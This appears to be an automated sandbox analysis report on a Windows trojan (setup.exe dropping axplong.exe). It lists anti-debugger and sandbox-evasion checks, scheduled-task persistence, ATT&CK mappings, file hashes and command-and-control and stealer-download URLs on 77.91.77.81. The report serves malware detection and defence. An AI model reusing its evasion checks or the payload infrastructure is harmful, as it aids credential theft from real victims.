                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7604Thread sleep time: -2059029s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7552Thread sleep count: 325 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7552Thread sleep time: -9750000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7796Thread sleep time: -720000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7608Thread sleep time: -50025s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7592Thread sleep count: 1342 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7592Thread sleep time: -2685342s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000002.00000002.1740388137.00000000011F7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001783000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001783000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: setup.exe, 00000000.00000002.1701889360.0000000000557000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1740388137.00000000011F7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\setup.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\setup.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04B2034E rdtsc 0_2_04B2034E
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0103A1A2 mov eax, dword ptr fs:[00000030h]1_2_0103A1A2
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0103643B mov eax, dword ptr fs:[00000030h]1_2_0103643B
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000002.00000002.1740388137.00000000011F7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 5Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0101D2E8 cpuid 1_2_0101D2E8
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0101CAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,1_2_0101CAED

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 2.2.axplong.exe.1000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.axplong.exe.1000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.setup.exe.360000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1699386717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1701798029.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1740305349.0000000001001000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1699458271.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1661502263.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter
                  1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  251
                  Virtualization/Sandbox Evasion
                  LSASS Memory741
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  12
                  Process Injection
                  Security Account Manager2
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information
                  NTDS251
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture11
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  setup.exe73%ReversingLabsWin32.Trojan.Casdet
                  setup.exe100%AviraTR/Crypt.TPM.Gen
                  setup.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe73%ReversingLabsWin32.Trojan.Casdet
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://77.91.77.81/100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.php2100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.php100%Avira URL Cloudmalware
                  http://77.91.77.81/Kiru9gu/index.phpm32100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.phpR-100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.phpl100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.phpem32100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.phpoS100%Avira URL Cloudphishing
                  http://77.91.77.81/Kiru9gu/index.phptI100%Avira URL Cloudphishing
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://77.91.77.81/Kiru9gu/index.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://77.91.77.81/axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.phpR-axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.phplaxplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.phpem32axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.php2axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.phpoSaxplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.phpm32axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://77.91.77.81/Kiru9gu/index.phptIaxplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  77.91.77.81
                  unknownRussian Federation
                  42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1465704
                  Start date and time:2024-07-02 00:24:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 39s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:setup.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 7564 because there are no executed function
                  • Execution Graph export aborted for target setup.exe, PID 7348 because it is empty
                  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: setup.exe
                  TimeTypeDescription
                  18:25:02API Interceptor10993196x Sleep call for process: axplong.exe modified
                  23:25:01Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  77.91.77.811719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                  • 77.91.77.81/stealc/random.exe
                  Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.81/stealc/random.exe
                  8vZMEr8sm9.exeGet hashmaliciousAmadeyBrowse
                  • 77.91.77.81/stealc/random.exe
                  1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.81/mine/amadka.exe
                  Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.81/stealc/random.exe
                  1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                  • 77.91.77.81/stealc/random.exe
                  j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.81/stealc/random.exe
                  1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                  • 77.91.77.81/stealc/random.exe
                  ukuWaeRgPR.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.81/stealc/random.exe
                  tAa6xNsucX.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.81/mine/amadka.exe
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                  • 77.91.77.80
                  Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.82
                  8vZMEr8sm9.exeGet hashmaliciousAmadeyBrowse
                  • 77.91.77.82
                  1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.82
                  Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.82
                  1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                  • 77.91.77.80
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 77.91.77.82
                  installer.exeGet hashmaliciousRisePro StealerBrowse
                  • 77.91.77.66
                  jYXfxdLoiV.pdfGet hashmaliciousGRQ ScamBrowse
                  • 77.91.77.34
                  j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                  • 77.91.77.82
                  No context
                  No context
                  Process:C:\Users\user\Desktop\setup.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1942016
                  Entropy (8bit):7.950488194711155
                  Encrypted:false
                  SSDEEP:49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ
                  MD5:EAA443F37443CB7221D63E0891243384
                  SHA1:D3242326B2AC1AE6E9817A49DF33C3A79E209AEE
                  SHA-256:BEF6F82A9C4064F8639E804036F460BAFDD01EEC87A355E247775D315B76DB13
                  SHA-512:8405C44C1EEA8578224EB6495F689D66E4E2F6503C0BF08D3C111E4E307603A35089649296EBF89B76D339C9517A83133B741C655097A9FE319F25AAE1F6AFDB
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 73%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f..............................L...........@...........................M.....Y.....@.................................X...l.............................L.............................\.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...cykfsdxm.....@2.....................@...inbhqvty......L......|..............@....taggant.0....L.."..................@...........................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\setup.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\setup.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286
                  Entropy (8bit):3.4217877499171836
                  Encrypted:false
                  SSDEEP:6:VG9k61/XpRKUEZ+lX1YC7UPelkDdtPjgsW2YRZuy0l1sBEt0:VcfpRKQ1h7keeDHjzvYRQV1sit0
                  MD5:E84EB3DFBD257D2FB19EA445429C8867
                  SHA1:2BD433FA58463454DD24077F999E7C021CEFAAFF
                  SHA-256:45B7EEBE01C9698DC07D67E81DACBA33DB24CA10BE607DDE5001166FA4918D16
                  SHA-512:746E2E48F184222E43C4F40A0E30A870D26B03E0D9316EB9E279AE61CA0DBBE03C099A25C9F5EEB3B6485CC9F925ACD2A1B8412D76C5F0F900012639CEDF5751
                  Malicious:false
                  Reputation:low
                  Preview:....K#H....F...F5b..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.8.2.5.4.6.2.4.2.4.3.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.950488194711155
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:setup.exe
                  File size:1'942'016 bytes
                  MD5:eaa443f37443cb7221d63e0891243384
                  SHA1:d3242326b2ac1ae6e9817a49df33c3a79e209aee
                  SHA256:bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
                  SHA512:8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb
                  SSDEEP:49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ
                  TLSH:D8953341EE619818C54DF57BE20837F70BD903DE301C9294D61713EEA9E3A99796383B
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x8ce000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x665ECF2A [Tue Jun 4 08:24:10 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                  Instruction
                  jmp 00007F808CE7939Ah
                  jo 00007F808CE793B3h
                  add byte ptr [eax], al
                  jmp 00007F808CE7B395h
                  add byte ptr [edx+ecx], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  and al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [eax+00000000h], eax
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  pop es
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax+0Ah], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [eax+00000000h], eax
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add al, 0Ah
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [edx], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  push es
                  add byte ptr [eax], 00000000h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  pop es
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [edi], cl
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [ecx], al
                  add byte ptr [eax], 00000000h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0580x6c.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4cc6ac0x10cykfsdxm
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x4cc65c0x18cykfsdxm
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x680000x2dc0088424d00171121c7b7dfe807dc783ef1False0.9983617230191257data7.984381286148552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x690000x1e00x20098d31dc711c36ab7d863c5c833f8e086False0.578125data4.579128846761863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x6a0000x10000x2006e66ae8f9a75bc604a087c954abf8737False0.15234375data1.0684380430289213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x6b0000x2b90000x2002986a28d7f7e46b042e785f185ddc6faunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  cykfsdxm0x3240000x1a90000x1a8a00ea6be42942e2ff69970d4d81b5d0fbceFalse0.9944855985060347data7.954405328517533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  inbhqvty0x4cd0000x10000x400c7defbf3f0eaa9ad94a957c8ec2213eeFalse0.7734375data6.108558188907066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x4ce0000x30000x22005c28f16766972ae6017c3955dfa9fd62False0.06284466911764706DOS executable (COM)0.7560203790449809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x4cc6bc0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                  DLLImport
                  kernel32.dlllstrcpy
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
